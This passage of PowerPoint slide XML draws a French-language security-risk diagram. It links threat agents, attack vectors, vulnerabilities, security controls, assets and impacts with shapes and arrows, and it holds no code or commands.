                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Attaque</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle 76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3881651" y="2744141"/>
              <a:ext cx="685800" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solid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err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Contrôle</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Can 77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4884761" y="1796353"/>
              <a:ext cx="685800" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solid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err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Fonction</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="Folded Corner 81"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867400" y="1164470"/>
              <a:ext cx="738116" cy="446965"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solid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accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="83" name="Group 82"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="437867" y="1198725"/>
              <a:ext cx="190500" cy="370765"/>
              <a:chOff x="304800" y="805214"/>
              <a:chExt cx="228600" cy="490186"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="132" name="Straight Connector 131"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="415120" y="924635"/>
                <a:ext cx="1" cy="21609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304800" y="1130490"/>
                <a:ext cx="114300" cy="16491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19100" y="1143000"/>
                <a:ext cx="1143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304800" y="1022445"/>
                <a:ext cx="228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Flowchart: Connector 135"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="342900" y="805214"/>
                <a:ext cx="152400" cy="125105"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector">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ectangle 83"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2667000" y="1145267"/>
              <a:ext cx="990600" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Vulnérabilité</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name="Rectangle 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2677236" y="2744140"/>
              <a:ext cx="980364" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solid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err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Vulnérabilité</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="89" name="Right Arrow Callout 88"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1312744" y="2196958"/>
              <a:ext cx="820856" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25000"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 25000"/>
                <a:gd name="adj4" fmla="val 77447"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Attaque</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Rectangle 89"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2667000" y="2192402"/>
              <a:ext cx="990600" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Vulnérabilité</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Rectangle 91"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2667000" y="1674928"/>
              <a:ext cx="990600" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Vulnérabilité</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="93" name="Group 92"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="448459" y="1714728"/>
              <a:ext cx="205570" cy="373064"/>
              <a:chOff x="304800" y="805214"/>
              <a:chExt cx="228600" cy="490186"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="127" name="Straight Connector 126"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="415120" y="924635"/>
                <a:ext cx="1" cy="21609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304800" y="1130490"/>
                <a:ext cx="114300" cy="16491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419100" y="1143000"/>
                <a:ext cx="1143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04800" y="1022445"/>
                <a:ext cx="228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Flowchart: Connector 130"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="342900" y="805214"/>
                <a:ext cx="152400" cy="125105"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector">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3881651" y="1674927"/>
              <a:ext cx="685800" cy="454933"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Contrôle</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="Can 94"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876800" y="1301460"/>
              <a:ext cx="685800" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Bien</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="96" name="Straight Arrow Connector 95"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="73" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="762000" y="1371599"/>
              <a:ext cx="550744" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="tx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97" name="Elbow Connector 96"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="76" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="762000" y="1373867"/>
              <a:ext cx="550744" cy="527393"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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9" name="Right Arrow 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2400300" y="2905211"/>
              <a:ext cx="419100" cy="135058"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 5179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ight Arrow 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2412242" y="2353473"/>
              <a:ext cx="407158" cy="135058"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 5179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Elbow Connector 100"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="76" idx="3"/>
              <a:endCxn id="87" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2133600" y="1901260"/>
              <a:ext cx="543636" cy="1071480"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 48477"/>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03" name="Elbow Connector 102"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="76" idx="3"/>
              <a:endCxn id="90" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2133600" y="1901260"/>
              <a:ext cx="533400" cy="519742"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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104" name="Right Arrow 103"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2412242" y="1320424"/>
              <a:ext cx="407158" cy="150022"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 5179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ight Arrow 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2416223" y="1835998"/>
              <a:ext cx="403177" cy="150991"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 5179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p:cNvCxnSpPr>
              <a:stCxn id="76" idx="3"/>
              <a:endCxn id="92" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2133600" y="1901260"/>
              <a:ext cx="533400" cy="2268"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="tx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84" idx="3"/>
              <a:endCxn id="74" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3657600" y="1372733"/>
              <a:ext cx="224051" cy="1134"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="254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92" idx="3"/>
              <a:endCxn id="94" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3657600" y="1902394"/>
              <a:ext cx="224051" cy="1134"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="254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stCxn id="87" idx="3"/>
              <a:endCxn id="77" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657600" y="2972740"/>
              <a:ext cx="224051" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="25400" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="tx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77" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4567451" y="2032763"/>
              <a:ext cx="317310" cy="939978"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="25400" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="tx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74" idx="3"/>
              <a:endCxn id="95" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4567451" y="1372733"/>
              <a:ext cx="309349" cy="195427"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="254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14" name="Elbow Connector 113"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="94" idx="3"/>
              <a:endCxn id="95" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4567451" y="1568160"/>
              <a:ext cx="309349" cy="334234"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="254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15" name="Elbow Connector 114"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="95" idx="4"/>
              <a:endCxn id="82" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5562600" y="1387953"/>
              <a:ext cx="304800" cy="180207"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="tx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16" name="Folded Corner 115"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5855458" y="2341255"/>
              <a:ext cx="750058" cy="446965"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="118" name="Elbow Connector 117"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="78" idx="4"/>
              <a:endCxn id="82" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5570561" y="1387953"/>
              <a:ext cx="296839" cy="675100"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="25400" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="tx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194197" y="596556"/>
              <a:ext cx="685800" cy="489871"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>Agents de Menace</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="120" name="TextBox 119"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1312744" y="596556"/>
              <a:ext cx="685800" cy="489871"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
                <a:t>Vecteurs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
                <a:t>d’Attaque</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122" name="TextBox 121"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2677236" y="596556"/>
              <a:ext cx="980364" cy="230832"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
                <a:t>Vulnérabilités</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="124" name="TextBox 123"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3872552" y="596556"/>
              <a:ext cx="762000" cy="489871"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
                <a:t>Contrôles</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t> de Sécurité</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125" name="TextBox 124"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4838700" y="596556"/>
              <a:ext cx="762000" cy="489871"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
